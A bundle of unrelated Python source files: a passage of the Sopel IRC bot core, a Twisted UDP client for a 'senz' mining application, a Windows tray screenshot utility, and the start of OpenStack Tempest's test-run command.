for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
callable_name = getattr(func, "__name__", 'UNKNOWN')
LOGGER.debug(
'Job added "%s", will run every %d seconds',
callable_name,
interval)
for func in urls:
for regex in func.url_regex:
self.register_url_callback(regex, func)
callable_name = getattr(func, "__name__", 'UNKNOWN')
LOGGER.debug(
'URL Callback added "%s" for URL pattern "%s"',
callable_name,
regex)
@deprecated(
reason="Replaced by `say` method.",
version='6.0',
removed_in='8.0')
def msg(self, recipient, text, max_messages=1):
"""Old way to make the bot say something on IRC.
:param str recipient: nickname or channel to which to send message
:param str text: message to send
:param int max_messages: split ``text`` into at most this many messages
if it is too long to fit in one (optional)
.. deprecated:: 6.0
Use :meth:`say` instead. Will be removed in Sopel 8.
"""
self.say(text, recipient, max_messages)
def call(self, func, sopel, trigger):
"""Call a function, applying any rate limits or other restrictions.
:param func: the function to call
:type func: :term:`function`
:param sopel: a SopelWrapper instance
:type sopel: :class:`SopelWrapper`
:param Trigger trigger: the Trigger object for the line from the server
that triggered this call
"""
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
# if channel has its own config section, check for excluded plugins/plugin methods
if trigger.sender in self.config:
channel_config = self.config[trigger.sender]
LOGGER.debug(
"Evaluating configuration for %s.%s in channel %s",
func.plugin_name, func.__name__, trigger.sender
)
# disable listed plugins completely on provided channel
if 'disable_plugins' in channel_config:
disabled_plugins = channel_config.disable_plugins.split(',')
# if "*" is used, we are disabling all plugins on provided channel
if '*' in disabled_plugins:
LOGGER.debug(
"All plugins disabled in %s; skipping execution of %s.%s",
trigger.sender, func.plugin_name, func.__name__
)
return
if func.plugin_name in disabled_plugins:
LOGGER.debug(
"Plugin %s is disabled in %s; skipping execution of %s",
func.plugin_name, trigger.sender, func.__name__
)
return
# disable chosen methods from plugins
if 'disable_commands' in channel_config:
disabled_commands = literal_eval(channel_config.disable_commands)
if func.plugin_name in disabled_commands:
if func.__name__ in disabled_commands[func.plugin_name]:
LOGGER.debug(
"Skipping execution of %s.%s in %s: disabled_commands matched",
func.plugin_name, func.__name__, trigger.sender
)
return
try:
exit_code = func(sopel, trigger)
except Exception as error: # TODO: Be specific
exit_code = None
self.error(trigger, exception=error)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def get_triggered_callables(self, priority, pretrigger, blocked):
"""Get triggered callables by priority.
:param str priority: priority to retrieve callables
:param pretrigger: Sopel pretrigger object
:type pretrigger: :class:`~sopel.trigger.PreTrigger`
:param bool blocked: true if nick or channel is blocked from triggering
callables
:return: a tuple with the callable, the trigger, and if it's blocked
:rtype: :class:`tuple`
This methods retrieves all triggered callables for this ``priority``
level. It yields each function with its :class:`trigger
<sopel.trigger.Trigger>` object and a boolean flag to tell if this
callable is blocked or not.
To be triggered, a callable must match the ``pretrigger`` using a regex
pattern. Then it must comply with other criteria (if any) such as
event, intents, and echo-message filters.
A triggered callable won't actually be invoked by Sopel if the nickname
or hostname is ``blocked``, *unless* the nickname is an admin or
the callable is marked as "unblockable".
.. seealso::
Sopel invokes triggered callables in its :meth:`~.dispatch` method.
The priority of a callable can be set with the
:func:`sopel.module.priority` decorator. Other decorators from
:mod:`sopel.module` provide additional criteria and conditions.
"""
args = pretrigger.args
text = args[-1] if args else ''
event = pretrigger.event
intent = pretrigger.tags.get('intent')
nick = pretrigger.nick
is_echo_message = (
nick.lower() == self.nick.lower() and
event in ["PRIVMSG", "NOTICE"]
)
user_obj = self.users.get(nick)
account = user_obj.account if user_obj else None
# get a copy of the list of (regex, function) to prevent race-condition
# e.g. when a callable wants to remove callable (other or itself)
# from the bot, Python won't (and must not) allow to modify a dict
# while it iterates over this very same dict.
items = list(self._callables[priority].items())
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
for func in funcs:
trigger = Trigger(
self.settings, pretrigger, match, account)
# check event
if event not in func.event:
continue
# check intents
if hasattr(func, 'intents'):
if not intent:
continue
match = any(
func_intent.match(intent)
for func_intent in func.intents
)
if not match:
continue
# check echo-message feature
if is_echo_message and not func.echo:
continue
is_unblockable = func.unblockable or trigger.admin
is_blocked = blocked and not is_unblockable
yield (func, trigger, is_blocked)
def _is_pretrigger_blocked(self, pretrigger):
if self.settings.core.nick_blocks or self.settings.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
return (nick_blocked, host_blocked)
def dispatch(self, pretrigger):
"""Dispatch a parsed message to any registered callables.
:param pretrigger: a parsed message from the server
:type pretrigger: :class:`~sopel.trigger.PreTrigger`
The ``pretrigger`` (a parsed message) is used to find matching callables;
it will retrieve them by order of priority, and run them. It runs
triggered callables in separate threads, unless they are marked
otherwise with the :func:`sopel.module.thread` decorator.
However, it won't run triggered callables at all when they can't be run
for blocked nickname or hostname (unless marked "unblockable" with
the :func:`sopel.module.unblockable` decorator).
.. seealso::
To get a list of triggered callables by priority, it uses
:meth:`~get_triggered_callables`. This method is also responsible
for telling ``dispatch`` if the function is blocked or not.
"""
# list of commands running in separate threads for this dispatch
running_triggers = []
# nickname/hostname blocking
nick_blocked, host_blocked = self._is_pretrigger_blocked(pretrigger)
blocked = bool(nick_blocked or host_blocked)
list_of_blocked_functions = []
# trigger by priority
for priority in ('high', 'medium', 'low'):
items = self.get_triggered_callables(priority, pretrigger, blocked)
for func, trigger, is_blocked in items:
function_name = "%s.%s" % (func.__module__, func.__name__)
# skip running blocked functions, but track them for logging
if is_blocked:
list_of_blocked_functions.append(function_name)
continue
# call triggered function
wrapper = SopelWrapper(
self, trigger, output_prefix=func.output_prefix)
if func.thread:
# run in a separate thread
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.name = '%s-%s' % (t.name, function_name)
t.start()
running_triggers.append(t)
else:
# direct call
self.call(func, wrapper, trigger)
# log blocked functions
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both blocklists'
elif nick_blocked:
block_type = 'nick blocklist'
else:
block_type = 'host blocklist'
LOGGER.debug(
"%s prevented from using %s by %s.",
pretrigger.nick,
', '.join(list_of_blocked_functions),
block_type,
)
# update currently running triggers
self._update_running_triggers(running_triggers)
@property
def running_triggers(self):
"""Current active threads for triggers.
:return: the running thread(s) currently processing trigger(s)
:rtype: :term:`iterable`
This is for testing and debugging purposes only.
"""
with self._running_triggers_lock:
return [t for t in self._running_triggers if t.is_alive()]
def _update_running_triggers(self, running_triggers):
"""Update list of running triggers.
:param list running_triggers: newly started threads
We want to keep track of running triggers, mostly for testing and
debugging purposes. For instance, it'll help make sure, in tests, that
a bot plugin has finished processing a trigger, by manually joining
all running threads.
This is kept private, as it's purely internal machinery and isn't
meant to be manipulated by outside code.
"""
# update bot's global running triggers
with self._running_triggers_lock:
running_triggers = running_triggers + self._running_triggers
self._running_triggers = [
t for t in running_triggers if t.is_alive()]
def on_scheduler_error(self, scheduler, exc):
"""Called when the Job Scheduler fails.
:param scheduler: the JobScheduler that errored
:type scheduler: :class:`sopel.tools.jobs.JobScheduler`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def on_job_error(self, scheduler, job, exc):
"""Called when a job from the Job Scheduler fails.
:param scheduler: the JobScheduler responsible for the errored ``job``
:type scheduler: :class:`sopel.tools.jobs.JobScheduler`
:param job: the Job that errored
:type job: :class:`sopel.tools.jobs.Job`
:param Exception exc: the raised exception
.. seealso::
:meth:`Sopel.error`
"""
self.error(exception=exc)
def error(self, trigger=None, exception=None):
"""Called internally when a plugin causes an error.
:param trigger: the ``Trigger``\\ing line (if available)
:type trigger: :class:`sopel.trigger.Trigger`
:param Exception exception: the exception raised by the error (if
available)
"""
message = 'Unexpected error'
if exception:
message = '{} ({})'.format(message, exception)
if trigger:
message = '{} from {} at {}. Message was: {}'.format(
message, trigger.nick, str(datetime.now()), trigger.group(0)
)
LOGGER.exception(message)
if trigger and self.settings.core.reply_errors and trigger.sender is not None:
self.say(message, trigger.sender)
def _host_blocked(self, host):
"""Check if a hostname is blocked.
:param str host: the hostname to check
"""
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
"""Check if a nickname is blocked.
:param str nick: the nickname to check
"""
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
"""Internal bot shutdown method."""
# Stop Job Scheduler
LOGGER.info('Stopping the Job Scheduler.')
self.scheduler.stop()
try:
self.scheduler.join(timeout=15)
except RuntimeError:
LOGGER.exception('Unable to stop the Job Scheduler.')
else:
LOGGER.info('Job Scheduler stopped.')
self.scheduler.clear_jobs()
# Shutdown plugins
LOGGER.info(
'Calling shutdown for %d plugins.', len(self.shutdown_methods))
for shutdown_method in self.shutdown_methods:
try:
LOGGER.debug(
'Calling %s.%s',
shutdown_method.__module__,
shutdown_method.__name__)
shutdown_method(self)
except Exception as e:
LOGGER.exception('Error calling shutdown method: %s', e)
# Avoid calling shutdown methods if we already have.
self.shutdown_methods = []
def register_url_callback(self, pattern, callback):
"""Register a ``callback`` for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to register
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to handle matching URLs
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``setup()``::
if 'url_callbacks' not in bot.memory:
bot.memory['url_callbacks'] = tools.SopelMemory()
regex = re.compile(r'http://example.com/path/.*')
bot.memory['url_callbacks'][regex] = callback
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.register_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.module.url`.
"""
if 'url_callbacks' not in self.memory:
self.memory['url_callbacks'] = tools.SopelMemory()
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.memory['url_callbacks'][pattern] = callback
def unregister_url_callback(self, pattern, callback):
"""Unregister the callback for URLs matching the regex ``pattern``.
:param pattern: compiled regex pattern to unregister callback
:type pattern: :ref:`re.Pattern <python:re-objects>`
:param callback: callable object to remove
:type callback: :term:`function`
.. versionadded:: 7.0
This method replaces manual management of ``url_callbacks`` in
Sopel's plugins, so instead of doing this in ``shutdown()``::
regex = re.compile(r'http://example.com/path/.*')
try:
del bot.memory['url_callbacks'][regex]
except KeyError:
pass
use this much more concise pattern::
regex = re.compile(r'http://example.com/path/.*')
bot.unregister_url_callback(regex, callback)
It's recommended you completely avoid manual management of URL
callbacks through the use of :func:`sopel.module.url`.
"""
if 'url_callbacks' not in self.memory:
# nothing to unregister
return
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
try:
del self.memory['url_callbacks'][pattern]
except KeyError:
pass
def search_url_callbacks(self, url):
"""Yield callbacks whose regex pattern matches the ``url``.
:param str url: URL found in a trigger
:return: yield 2-value tuples of ``(callback, match)``
For each pattern that matches the ``url`` parameter, it yields a
2-value tuple of ``(callable, match)`` for that pattern.
The ``callable`` is the one registered with
:meth:`register_url_callback`, and the ``match`` is the result of
the regex pattern's ``search`` method.
.. versionadded:: 7.0
.. seealso::
The Python documentation for the `re.search`__ function and
the `match object`__.
.. __: https://docs.python.org/3.6/library/re.html#re.search
.. __: https://docs.python.org/3.6/library/re.html#match-objects
"""
if 'url_callbacks' not in self.memory:
# nothing to search
return
for regex, function in tools.iteritems(self.memory['url_callbacks']):
match = regex.search(url)
if match:
yield function, match
def restart(self, message):
"""Disconnect from IRC and restart the bot.
:param str message: QUIT message to send (e.g. "Be right back!")
"""
self.wantsrestart = True
self.quit(message)
class SopelWrapper(object):
"""Wrapper around a Sopel instance and a Trigger.
:param sopel: Sopel instance
:type sopel: :class:`~sopel.bot.Sopel`
:param trigger: IRC Trigger line
:type trigger: :class:`~sopel.trigger.Trigger`
:param str output_prefix: prefix for messages sent through this wrapper
(e.g. plugin tag)
This wrapper will be used to call Sopel's triggered commands and rules as
their ``bot`` argument. It acts as a proxy to :meth:`send messages<say>`
to the sender (either a channel or in a private message) and even to
:meth:`reply to someone<reply>` in a channel.
"""
def __init__(self, sopel, trigger, output_prefix=''):
if not output_prefix:
# Just in case someone passes in False, None, etc.
output_prefix = ''
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
object.__setattr__(self, '_out_pfx', output_prefix)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
"""Override ``Sopel.say`` to use trigger source by default.
:param str message: message to say
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param int max_messages: split ``text`` into at most this many messages
if it is too long to fit in one (optional)
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.say`
"""
if destination is None:
destination = self._trigger.sender
self._bot.say(self._out_pfx + message, destination, max_messages)
def action(self, message, destination=None):
"""Override ``Sopel.action`` to use trigger source by default.
:param str message: action message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.action`
"""
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
"""Override ``Sopel.notice`` to use trigger source by default.
:param str message: notice message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
.. seealso::
:meth:`sopel.bot.Sopel.notice`
"""
if destination is None:
destination = self._trigger.sender
self._bot.notice(self._out_pfx + message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
"""Override ``Sopel.reply`` to ``reply_to`` sender by default.
:param str message: reply message
:param str destination: channel or nickname; defaults to
:attr:`trigger.sender <sopel.trigger.Trigger.sender>`
:param str reply_to: person to reply to; defaults to
:attr:`trigger.nick <sopel.trigger.Trigger.nick>`
:param bool notice: reply as an IRC notice or with a simple message
The ``destination`` will default to the channel in which the
trigger happened (or nickname, if received in a private message).
``reply_to`` will default to the nickname who sent the trigger.
.. seealso::
:meth:`sopel.bot.Sopel.reply`
"""
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def kick(self, nick, channel=None, message=None):
"""Override ``Sopel.kick`` to kick in a channel
:param str nick: nick to kick out of the ``channel``
:param str channel: optional channel to kick ``nick`` from
:param str message: optional message for the kick
The ``channel`` will default to the channel in which the call was
triggered. If triggered from a private message, ``channel`` is
required.
.. seealso::
:meth:`sopel.bot.Sopel.kick`
"""
if channel is None:
if self._trigger.is_privmsg:
raise RuntimeError('Error: KICK requires a channel.')
else:
channel = self._trigger.sender
if nick is None:
raise RuntimeError('Error: KICK requires a nick.')
self._bot.kick(nick, channel, message)
|
miner.py
|
import gettext
import time
import multiprocessing
from Tkinter import Tk
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import reactor, threads
import sys
from miner_ui import cumulative_logger
from miner_ui.main_window_app import MainWindowApp
from handlers.senz_handler import *
from config.config import *
_ = gettext.gettext
logging.basicConfig() # comment this stop console logger print
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
if not (os.path.exists('logs')):
os.mkdir('logs')
filehandler = logging.FileHandler('logs/miner.log')
filehandler.setLevel(logging.INFO)
# create a logging format
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
filehandler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(filehandler)
class SenzcProtocol(DatagramProtocol):
"""
Protocol will connects to udp port(which server runs on). When packet(semz)
comes to server we have to asynchornosly handle them. We are starting
thread save twisted thread on GET, SHARE and PUT senz
"""
def __init__(self, host, port):
"""
initiliaze senz server host and port
Args:
host - server host
port - server port
"""
self.host = host
self.port = port
def startProtocol(self):
"""
Call when twisted udp protocol starts, Few actions need to be done from
here
1. First need to connect to udp socket from here.
2. Then need to share public key to server via SHARE senz
3. Finall need to start looping call to send ping messages to
server in every 30 mins
"""
logger.info('client started')
self.transport.connect(self.host, self.port)
# share public key on start
self.share_pubkey()
def stopProtocol(self):
"""
Call when datagram protocol stops. Need to clear global connection if
exits from here
"""
reactor.callFromThread(reactor.stop)
logger.info('client protocol stopped')
root = Tk()
root.withdraw()
tkMessageBox.showinfo("Message", "Switch not connected or not Start , try later")
root.quit()
#os._exit(0)
def datagramReceived(self, datagram, host):
"""
Call when datagram recived, datagrams are senz messages in our scenario
We have to handle receiveing senz from here. Senz handling part will be
delegated to SenzHandler
Args:
datagra - senz message
host - receving host
"""
logger.info('datagram received %s' % datagram)
# handle receved datagram(senz)
self.handle_datagram(datagram)
def share_pubkey(self):
"""
Send public key of the senzy to server via SHARE senz. We have to
digitally senz the senz before sending to server.
SHARE senz message would be like below
SHARE:
#pubkey <pubkey>
#time <time>
@mysensors
^<sender> <digital signature>
"""
# TODO get sender and receiver config
# send pubkey to server via SHARE senz
pubkey = get_pubkey()
receiver = servername
sender = clientname
senz = "SHARE #pubkey %s #time %s @%s ^%s" % (pubkey, time.time(), receiver, sender)
signed_senz = sign_senz(senz)
# print(signed_senz)
self.transport.write(signed_senz)
def handle_datagram(self, datagram):
"""
Handle receving senz from here, we have to do
1. Parse the datagram and obtain senz
2. We have to ignore ping messages from server
3. We have to handler GET, SHARE, PUT senz messages via SenzHandler
"""
#print datagram
if datagram == 'PING':
# we ingnore ping messages
#logger.info('ping received') # temporry stop pin message
pass
else:
# parse senz first
senz = parse(datagram)
# start threads for GET, PUT, DATA, SHARE senz
handler = SenzHandler(self.transport)
d = threads.deferToThread(handler.handleSenz, senz)
d.addCallback(handler.postHandle)
def init():
"""
Init client certificates from here. All keys will be stored in .keys/
directory in project root. We have to verify thie content of that directory
while initializing the keys
"""
# init keys via crypto utils
init_keys()
def start():
"""
Start upd senz protocol from here. It means connecting to senz server. We
have to provide server host and port details form here.(read from config)
"""
init()
# TODO get host and port from config
host = serverhost
port = serverport
# start ptotocol
try:
protocol = SenzcProtocol(host, port)
reactor.listenUDP(0, protocol)
reactor.run(installSignalHandlers=False)
except KeyboardInterrupt:
#print "Unexpected Shut Down"
sys.exit()
if __name__ == '__main__':
global t, t1
t = multiprocessing.Process(target=start, args=())
t.start()
cl = cumulative_logger.CumulativeLogger()
logger.info(_('Starting the SCPP Miner-M1 Application..!'))
t1 = multiprocessing.Process(target=MainWindowApp(cl).run(), args=())
t1.start()
|
Simple PSv3.py
|
from win10toast import ToastNotifier
import PySimpleGUIQt as sg
import os
from datetime import datetime
import threading
import pyautogui as p
# ------------------------------MS imports for admin privileges start---------------------------------------------------
import ctypes
import enum
import sys
# ------------------------------MS imports for admin privileges end-----------------------------------------------------
class App():
def __init__(self):
self.tray_start()
def tray_start(self):
self.thread1 = threading.Thread(target=self.notification(), daemon=True).start()
self.thread2 = threading.Thread(target=self.systray(), daemon=True).start()
def screenShot(self):
home = os.environ.get('USERPROFILE')
dir = 'Simple Print Screen'
if os.path.isdir(home+'/'+dir) is not True:
path = os.path.join(home,dir)
os.mkdir(path)
now = datetime.now()
n = now.strftime("_%H-%M-%S_%B_%d_%Y")
p.screenshot(home+f'/Simple Print Screen/SimplePrintScreen{n}.png')
def systray(self):
menu_def = ['BLANK', ['&Άνοιγμα φακέλου', '&Πληροφορίες', '&Έξοδος']]
tray = sg.SystemTray(menu=menu_def, filename=r'icon.ico', tooltip='Κλικ για Simple Print Screen')
while True:
menu_item = tray.Read()
if menu_item == 'Έξοδος':
break
elif menu_item == 'Άνοιγμα φακέλου':
home = os.environ.get('USERPROFILE')
dir = 'Simple Print Screen'
if os.path.isdir(home + '/' + dir) is not True:
path = os.path.join(home, dir)
os.mkdir(path)
os.startfile(home+'/'+dir)
elif menu_item == '__ACTIVATED__':
self.screenShot()
self.notificationSave()
elif menu_item == 'Πληροφορίες':
sg.Popup(' Πληροφορίες', ' Simple Print Screen Έκδοση 3.2 \n\n Ευχαριστώ που χρησιμοποιείτε την εφαρμογή. \n Η εφαρμογή αναπτύχθηκε από τον \n Κωνσταντίνο Καρακασίδη. \n\n Επικοινωνία: defendergr@gmail.com \n', icon='icon.ico')
def notification(self):
toaster = ToastNotifier()
toaster.show_toast('Simple Print Screen', 'Από: \nΚωνσταντίνος Καρακασίδης', duration=3, icon_path='icon.ico')
def notificationSave(self):
toaster = ToastNotifier()
toaster.show_toast('Simple Print Screen', 'Το στιγμιότυπο οθόνης αποθηκεύτηκε', duration=2, icon_path='icon.ico')
# ------------------------------MS code for admin privileges start------------------------------------------------------
class SW(enum.IntEnum):
HIDE = 0
MAXIMIZE = 3
MINIMIZE = 6
RESTORE = 9
SHOW = 5
SHOWDEFAULT = 10
SHOWMAXIMIZED = 3
SHOWMINIMIZED = 2
SHOWMINNOACTIVE = 7
SHOWNA = 8
SHOWNOACTIVATE = 4
SHOWNORMAL = 1
class ERROR(enum.IntEnum):
ZERO = 0
FILE_NOT_FOUND = 2
PATH_NOT_FOUND = 3
BAD_FORMAT = 11
ACCESS_DENIED = 5
ASSOC_INCOMPLETE = 27
DDE_BUSY = 30
DDE_FAIL = 29
DDE_TIMEOUT = 28
DLL_NOT_FOUND = 32
NO_ASSOC = 31
OOM = 8
SHARE = 26
def bootstrap():
if ctypes.windll.shell32.IsUserAnAdmin():
App()
else:
hinstance = ctypes.windll.shell32.ShellExecuteW(
None, 'runas', sys.executable, sys.argv[0], None, SW.SHOWNORMAL
)
if hinstance <= 32:
raise RuntimeError(ERROR(hinstance))
# ------------------------------MS code for admin privileges end--------------------------------------------------------
if __name__ == '__main__':
app = bootstrap()
|
run.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Runs tempest tests
This command is used for running the tempest tests
Test Selection
==============
Tempest run has several options:
* **--regex/-r**: This is a selection regex like what testr uses. It will run
any tests that match on re.match() with the regex
* **--smoke/-s**: Run all the tests tagged as smoke
There are also the **--blacklist-file** and **--whitelist-file** options that
let you pass a filepath to tempest run with the file format being a line
separated regex, with '#' used to signify the start of a comment on a line.
For example::
# Regex file
^regex1 # Match these tests
.*regex2 # Match those tests
The blacklist file will be used to construct a negative lookahead regex and
the whitelist file will simply OR all the regexes in the file. The whitelist
and blacklist file options are mutually exclusive so you can't use them
together. However, you can combine either with a normal regex or the *--smoke*
flag. When used with a blacklist file the generated regex will be combined to
something like::
^((?!black_regex1|black_regex2).)*$cli_regex1
When combined with a whitelist file all the regexes from the file and the CLI
regexes will be ORed.
You can also use the **--list-tests** option in conjunction with selection
arguments to list which tests will be run.
Test Execution
==============
There are several options to control how the tests are executed. By default
tempest will run in parallel with a worker for each CPU present on the machine.
If you want to adjust the number of workers use the **--concurrency** option
and if you want to run tests serially use **--serial/-t**
Running with Workspaces
-----------------------
Tempest run enables you to run your tempest tests from any setup tempest
workspace it relies on you having setup a tempest workspace with either the
``tempest init`` or ``tempest workspace`` commands. Then using the
``--workspace`` CLI option you can specify which one of your workspaces you
want to run tempest from. Using this option you don't have to run Tempest
directly with you current working directory being the workspace, Tempest will
take care of managing everything to be executed from there.
Running from Anywhere
---------------------
Tempest run provides you with an option to execute tempest from anywhere on
your system. You are required to provide a config file in this case with the
``--config-file`` option. When run tempest will create a .testrepository
directory and a .testr.conf file in your current working directory. This way
you can use testr commands directly to inspect the state of the previous run.
Test Output
===========
By default tempest run's output to STDOUT will be generated using the
subunit-trace output filter. But, if you would prefer a subunit v2 stream be
output to STDOUT use the **--subunit** flag
Combining Runs
==============
There are certain situations in which you want to split a single run of tempest
across 2 executions of tempest run. (for example to run part of the tests
serially and others in parallel) To accomplish this but still treat the results
as a single run you can leverage the **--combine** option which will append
the current run's results with the previous runs.
"""
import io
import os
import sys
import tempfile
import threading
from cliff import command
from os_testr import regex_builder
from os_testr import subunit_trace
from oslo_serialization import jsonutils as json
import six
from testrepository.commands import run_argv
from tempest import clients
from tempest.cmd import cleanup_service
from tempest.cmd import init
from tempest.cmd import workspace
from tempest.common import credentials_factory as credentials
from tempest import config
CONF = config.CONF
SAVED_STATE_JSON = "saved_state.json"
class TempestRun(command.Command):
def _set_env(self, config_file=None):
if config_file:
CONF.set_config_path(os.path.abspath(config_file))
# NOTE(mtreinish): This is needed so that testr doesn't gobble up any
# stacktraces on failure.
if 'TESTR_PDB' in os.environ:
return
else:
os.environ["TESTR_PDB"] = ""
# NOTE(dims): most of our .testr.conf try to test for PYTHON
# environment variable and fall back to "python", under python3
# if it does not exist. we should set it to the python3 executable
# to deal with this situation better for now.
if six.PY3 and 'PYTHON' not in os.environ:
os.environ['PYTHON'] = sys.executable
def _create_testrepository(self):
if not os.path.isdir('.testrepository'):
returncode = run_argv(['testr', 'init'], sys.stdin, sys.stdout,
sys.stderr)
if returncode:
sys.exit(returncode)
def _create_testr_conf(self):
top_level_path = os.path.dirname(os.path.dirname(__file__))
discover_path = os.path.join(top_level_path, 'test_discover')
file_contents = init.TESTR_CONF % (top_level_path, discover_path)
with open('.testr.conf', 'w+') as testr_conf_file:
testr_conf_file.write(file_contents)
def take_action(self, parsed_args):
returncode = 0
if parsed_args.config_file:
self._set_env(parsed_args.config_file)
else:
self._set_env()
# Workspace execution mode
if parsed_args.workspace:
workspace_mgr = workspace.WorkspaceManager(
parsed_args.workspace_path)
path = workspace_mgr.get_workspace(parsed_args.workspace)
if not path:
sys.exit(
"The %r workspace isn't registered in "
"%r. Use 'tempest init' to "
"register the workspace." %
(parsed_args.workspace, workspace_mgr.path))
os.chdir(path)
# NOTE(mtreinish): tempest init should create a .testrepository dir
# but since workspaces can be imported let's sanity check and
# ensure that one is created
self._create_testrepository()
# Local execution mode
elif os.path.isfile('.testr.conf'):
# If you're running in local execution mode and there is not a
# testrepository dir create one
self._create_testrepository()
# local execution with config file mode
elif parsed_args.config_file:
self._create_testr_conf()
self._create_testrepository()
else:
print("No .testr.conf file was found for local execution")
sys.exit(2)
if parsed_args.state:
self._init_state()
else:
pass
if parsed_args.combine:
temp_stream = tempfile.NamedTemporaryFile()
return_code = run_argv(['tempest', 'last', '--subunit'], sys.stdin,
temp_stream, sys.stderr)
if return_code > 0:
sys.exit(return_code)
regex = self._build_regex(parsed_args)
if parsed_args.list_tests:
argv = ['tempest', 'list-tests', regex]
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
options = self._build_options(parsed_args)
returncode = self._run(regex, options)
if returncode > 0:
sys.exit(returncode)
if parsed_args.combine:
return_code = run_argv(['tempest', 'last', '--subunit'], sys.stdin,
temp_stream, sys.stderr)
if return_code > 0:
sys.exit(return_code)
returncode = run_argv(['tempest', 'load', temp_stream.name],
sys.stdin, sys.stdout, sys.stderr)
sys.exit(returncode)
def get_description(self):
return 'Run tempest'
def _init_state(self):
print("Initializing saved state.")
data = {}
self.global_services = cleanup_service.get_global_cleanup_services()
self.admin_mgr = clients.Manager(
credentials.get_configured_admin_credentials())
admin_mgr = self.admin_mgr
kwargs = {'data': data,
'is_dry_run': False,
'saved_state_json': data,
'is_preserve': False,
'is_save_state': True}
for service in self.global_services:
svc = service(admin_mgr, **kwargs)
svc.run()
with open(SAVED_STATE_JSON, 'w+') as f:
f.write(json.dumps(data,
sort_keys=True, indent=2, separators=(',', ': ')))
def get_parser(self, prog_name):
parser = super(TempestRun, self).get_parser(prog_name)
parser = self._add_args(parser)
return parser
def _add_args(self, parser):
# workspace args
parser.add_argument('--workspace', default=None,
help='Name of tempest workspace to use for running'
' tests. You can see a list of workspaces '
'with tempest workspace list')
parser.add_argument('--workspace-path', default=None,
dest='workspace_path',
help="The path to the workspace file, the default "
"is ~/.tempest/workspace.yaml")
# Configuration flags
